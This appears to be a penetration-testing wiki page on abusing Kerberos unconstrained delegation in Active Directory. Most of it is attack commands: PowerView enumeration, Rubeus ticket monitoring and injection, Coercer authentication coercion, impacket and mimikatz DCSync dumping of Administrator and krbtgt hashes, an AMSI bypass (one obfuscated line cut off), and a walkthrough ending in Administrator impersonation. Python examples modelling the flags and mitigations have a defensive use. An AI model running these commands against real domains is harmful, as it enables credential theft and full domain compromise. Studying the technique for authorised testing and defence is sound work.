# Kerberos Unconstrained Delegation

## **Kerberos Unconstrained Delegation**

> General/Basic or Unconstrained Delegation allows the first-hop server (the web server in our example) to request access to any service on any computer in the domain on behalf of the authenticated user.

**Required**

1. Machines with unconstrained delegation enabled (enumerated below)
2. A user who has access to one of those machines

Essentially this looks like so: **`User`** --- authenticates to ---> **`IIS server`** ---> authenticates on behalf of the user ---> **`DB server`**

<figure><img src="/files/wd5jFsoxI9oe4cWojD6K" alt=""><figcaption></figcaption></figure>

### Tools

{% embed url="<https://github.com/dirkjanm/krbrelayx.git>" %}

Enumerate machines with unconstrained delegation:

{% code overflow="wrap" %}

```powershell
# PowerView: computers with the TRUSTED_FOR_DELEGATION bit set
Get-NetComputer -Unconstrained
Get-DomainComputer -Unconstrained
Get-DomainComputer -Unconstrained -Properties DnsHostName
Get-DomainComputer -Unconstrained | Select-Object samaccountname

# ActiveDirectory module (Import-Module ActiveDirectory)
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
# primaryGroupID 515 = Domain Computers; this leaves out domain controllers (516), which are always unconstrained
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
# Raw LDAP bitwise-AND match on userAccountControl; 524288 (0x80000) = TRUSTED_FOR_DELEGATION
Get-ADComputer -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
# All delegation-related attributes of a single host
Get-ADComputer "IIS" -Properties TrustedForDelegation,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount

# For contrast: constrained delegation (msDS-AllowedToDelegateTo populated)
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
```

{% endcode %}
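As an added example (not code from the page or from PowerView), the following Python classifies the attributes the queries above return, so an audit can separate expected hits (domain controllers are always unconstrained) from findings; the record shape and sample values are constructed.

```python
# Added example, not from the page: classify the attributes the queries above
# return, so an audit separates expected hits (domain controllers) from risky ones.
# userAccountControl bits (Microsoft-documented values)
TRUSTED_FOR_DELEGATION = 0x80000            # 524288, the bit in the LDAP filter above
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # 16777216, protocol transition
SERVER_TRUST_ACCOUNT = 0x2000               # 8192, set on domain controller accounts
DOMAIN_CONTROLLERS_RID = 516                # primaryGroupID of DCs (515 = Domain Computers)


def matches_ldap_filter(uac, bit=TRUSTED_FOR_DELEGATION):
    """Emulate (userAccountControl:1.2.840.113556.1.4.803:=bit): bitwise-AND match."""
    return (uac & bit) == bit


def classify(entry):
    """entry: dict of LDAP attributes (hypothetical shape). Returns (kind, risky)."""
    uac = int(entry.get("userAccountControl", 0))
    targets = entry.get("msDS-AllowedToDelegateTo") or []
    if matches_ldap_filter(uac):
        kind = "unconstrained"
    elif targets and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        kind = "constrained+protocol-transition"
    elif targets:
        kind = "constrained"
    else:
        kind = "none"
    # DCs are expected to be unconstrained; anything else with the bit is a finding
    is_dc = entry.get("primaryGroupID") == DOMAIN_CONTROLLERS_RID or bool(uac & SERVER_TRUST_ACCOUNT)
    return kind, kind == "unconstrained" and not is_dc


def audit(entries):
    """Return [(name, kind, risky), ...] for a list of entries."""
    return [(e["sAMAccountName"], *classify(e)) for e in entries]


# Constructed sample records, not real directory data
SAMPLE = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000, "primaryGroupID": 516},
    {"sAMAccountName": "IIS$", "userAccountControl": 0x81000, "primaryGroupID": 515},
    {"sAMAccountName": "WEB02$", "userAccountControl": 0x1001000, "primaryGroupID": 515,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/sql01.example.local:1433"]},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000, "primaryGroupID": 515},
]
```

Feed it the output of `Get-ADComputer ... -Properties userAccountControl,primaryGroupID,msDS-AllowedToDelegateTo` exported to JSON and only the non-DC unconstrained hosts come back flagged.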

<figure><img src="/files/YGjQr6sefw9DPxf6DOtD" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/LbqJXNeLFoS8ahHtq7nd" alt=""><figcaption></figcaption></figure>

{% hint style="info" %} <mark style="color:orange;">**Hint**</mark>**: discover users you hold WriteDACL permission over, or enumerate the domain to find a suitable user**
{% endhint %}

Rubeus

{% embed url="<https://github.com/r3motecontrol/Ghostpack-CompiledBinaries>" %}

{% code overflow="wrap" %}

```powershell
# Inject a base64-encoded ticket into the current logon session (pass-the-ticket)
.\Rubeus.exe ptt /ticket:<base64>

# Watch this host for new TGTs arriving, e.g. from a coerced machine account
.\Rubeus.exe monitor /interval:10 /targetuser:<MACHINE$> /nowrap

# Request a TGT with an NTLM hash and save it to a file
.\Rubeus.exe asktgt /user:abdo /domain:hacktor.local /ntlm:<hash> /outfile:FileName.tgt

# OR, on Linux, decode a base64 ticket into a kirbi file
cat b64.txt | base64 -d > ticket.kirbi
```

{% endcode %}

<figure><img src="/files/3MR8D5X3zVWt7PuBYvHa" alt=""><figcaption><p>TGT ticket for the websvc account.</p></figcaption></figure>

After obtaining the TGT from the domain controller, we can request service tickets for the allowed services, i.e., **CIFS** and **TIME**, or alternate services like **LDAP** or **WMI**.

### Coercer

{% code overflow="wrap" %}

```bash
# Coercer: make the target (kingslanding) authenticate back to the listener (winterfell), where the TGT is captured
coercer coerce -u arya.stark -d north.sevenkingdoms.local -p 'Needle' -t kingslanding.sevenkingdoms.local -l winterfell --always-continue
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# Use the captured DC machine-account TGT (set KRB5CCNAME to the ccache) to DCSync
sudo impacket-secretsdump -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING
```

{% endcode %}

mimikatz

{% code overflow="wrap" %}

```powershell
# Inject the captured DC ticket, then DCSync the Administrator account
mimikatz.exe "privilege::debug" "kerberos::ptt PDC.kirbi" "lsadump::dcsync /domain:hacktor.local /user:Administrator" "exit"
# Once the ticket is injected, run DCSync (here for krbtgt)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

{% endcode %}

#### Step 1: Enumerate Computers with Unconstrained Delegation

```powershell
# Dot-source PowerView so its functions load into the session
. .\PowerView.ps1
Get-NetComputer -Unconstrained
```

* Example output: We find the computer `WIN-Q4788GPE9L7` with unconstrained delegation enabled.

#### Step 2: Find Local Admin Access

```powershell
Find-LocalAdminAccess
```

<figure><img src="/files/T04E4obeyILPU99UKwo4" alt=""><figcaption></figcaption></figure>

* Output: Our user has local admin access to the computer with unconstrained delegation.

#### Step 3: Enable PowerShell Remoting

```powershell
Enable-PSRemoting
```

#### Step 4: Create and Use a PowerShell Session

```powershell
$sess = New-PSSession -ComputerName WIN-Q4788GPE9L7
Invoke-Command -FilePath ..\..\rem01x.crtp\Desktop\tools\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
```

* Bypass AMSI:

```powershell
# Flips AmsiUtils.amsiInitFailed via reflection so AMSI is skipped in this session
$amsiBypass = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static')
$amsiBypass.SetValue($null, $true)

# Obfuscated variant of the same technique (the line is cut off in the original)
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')
```

<figure><img src="/files/YgnBKJqU32wyM3tPcJF8" alt=""><figcaption></figcaption></figure>

#### Step 5: Dump Secrets and List Tickets

```powershell
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
```

<figure><img src="/files/qA1oqn21PTT2VZAuVeES" alt=""><figcaption></figcaption></figure>

#### Step 6: Export Tickets

```powershell
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
```

<figure><img src="/files/Q8XZvO1TPd03uYoGcHIX" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/y2j2Ln2CyzY2JwQPOAg7" alt=""><figcaption></figcaption></figure>

* Example output: Administrator `.kirbi` file.

#### Step 7: Monitor Actions on the Machine

```powershell
Invoke-UserHunter -ComputerName WIN-Q4788GPE9L7 -UserAdminCount -Delay 5 -Verbose
```

<figure><img src="/files/FivWmCBXrLEjUmZBW6os" alt=""><figcaption></figcaption></figure>

* Output: Administrator account detected.

#### Step 8: Pass the Ticket to Memory and Impersonate the User

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\Administrator\kerb\[0;120dde]-2-0-60a10000-Administrator@krbtgt-CRTP.LOCAL.kirbi"'
```

<figure><img src="/files/LWyABVxXMXo54EIKhUQ8" alt=""><figcaption></figcaption></figure>

* Result: We are now the administrator on the machine.

### Deep Dive into Unconstrained Delegation

#### Process Overview

1. Vegeta wants to access the server `web01` to list folders.
2. The `web01` process impersonates Vegeta and creates a new thread with Vegeta's credentials.
3. The server accesses the intended folder with the impersonated thread.

#### Configuration

To list computers with unconstrained delegation:

```powershell
Get-NetComputer -Unconstrained | select cn,useraccountcontrol
```

#### Network Traffic (Wireshark Capture)

1. Client requests a TGT.
2. Domain controller responds with the TGT.
3. Client requests a service ticket (TGS) for the web application.
4. Domain controller responds with the TGS.
5. Client requests another TGT to delegate to the web service.
6. Domain controller responds with a copy of the user TGT.
7. The application request goes to the web server.
8. The web service requests a TGS for the SQL server using the client's TGT.
9. Domain controller responds with the TGS.
10. Access is granted and the database server is successfully accessed.
11. Application replies.
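As an added example (not from the original page), here is a toy Python model of the eleven-step exchange above: a KDC that only hands out a forwardable TGT when the user is not marked sensitive, a client that requests the forwarded copy when the service ticket carries OK-AS-DELEGATE, and the web server's onward hop to SQL. The account names and flag handling are constructed simplifications of real Kerberos.

```python
from dataclasses import dataclass

TRUSTED_FOR_DELEGATION = 0x80000  # userAccountControl bit on the web service account
NOT_DELEGATED = 0x100000          # "Account is sensitive and cannot be delegated"

@dataclass
class Account:
    name: str
    uac: int = 0
    protected_user: bool = False  # member of Protected Users

@dataclass
class Ticket:
    client: str
    service: str             # "krbtgt" for a TGT
    forwardable: bool = False
    forwarded: bool = False
    ok_as_delegate: bool = False

class KDC:
    def __init__(self, accounts):
        self.accounts = {a.name: a for a in accounts}

    def as_req(self, user):            # steps 1-2: TGT, forwardable unless the user is sensitive
        acct = self.accounts[user]
        sensitive = bool(acct.uac & NOT_DELEGATED) or acct.protected_user
        return Ticket(user, "krbtgt", forwardable=not sensitive)

    def tgs_req(self, tgt, service):   # steps 3-4 and 8-9: service ticket
        svc = self.accounts[service]   # OK-AS-DELEGATE tells the client the service may hold a TGT
        return Ticket(tgt.client, service, ok_as_delegate=bool(svc.uac & TRUSTED_FOR_DELEGATION))

    def forwarded_tgt(self, tgt):      # steps 5-6: copy of the user's TGT for the service
        if not tgt.forwardable:
            return None                # refused: nothing for the web server to capture
        return Ticket(tgt.client, "krbtgt", forwardable=True, forwarded=True)

def web_request(kdc, user, web, sql):
    """Client side of steps 1-7, then the web server's hop to sql (8-9).
    Returns the ticket the web server obtained for sql, or None."""
    tgt = kdc.as_req(user)
    st = kdc.tgs_req(tgt, web)
    delegated = kdc.forwarded_tgt(tgt) if st.ok_as_delegate else None
    if delegated is None:
        return None                    # step 7 still happens, but web01 holds no user TGT
    # web01 now holds the user's TGT; unconstrained delegation puts no limit on
    # which service it asks for next (hence "any service on any computer")
    return kdc.tgs_req(delegated, sql)

# Constructed lab accounts (not from the page's environment)
LAB = KDC([Account("vegeta"), Account("web01$", uac=TRUSTED_FOR_DELEGATION),
           Account("sql01$"), Account("dba", uac=NOT_DELEGATED),
           Account("cto", protected_user=True)])
```

The two mitigations shown, the NOT_DELEGATED flag and Protected Users membership, stop the flow at step 6, which is why both are recommended for privileged accounts.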

### Abusing Unconstrained Delegation

Keep monitoring the host for incoming TGTs (the Rubeus `monitor` command or the `Invoke-UserHunter` loop above) and reuse captured tickets as shown in Step 8.

## References <a href="#id-6572" id="id-6572"></a>

{% embed url="<https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/?source=post_page-----4a0eddc5bb13-------------------------------->" %}

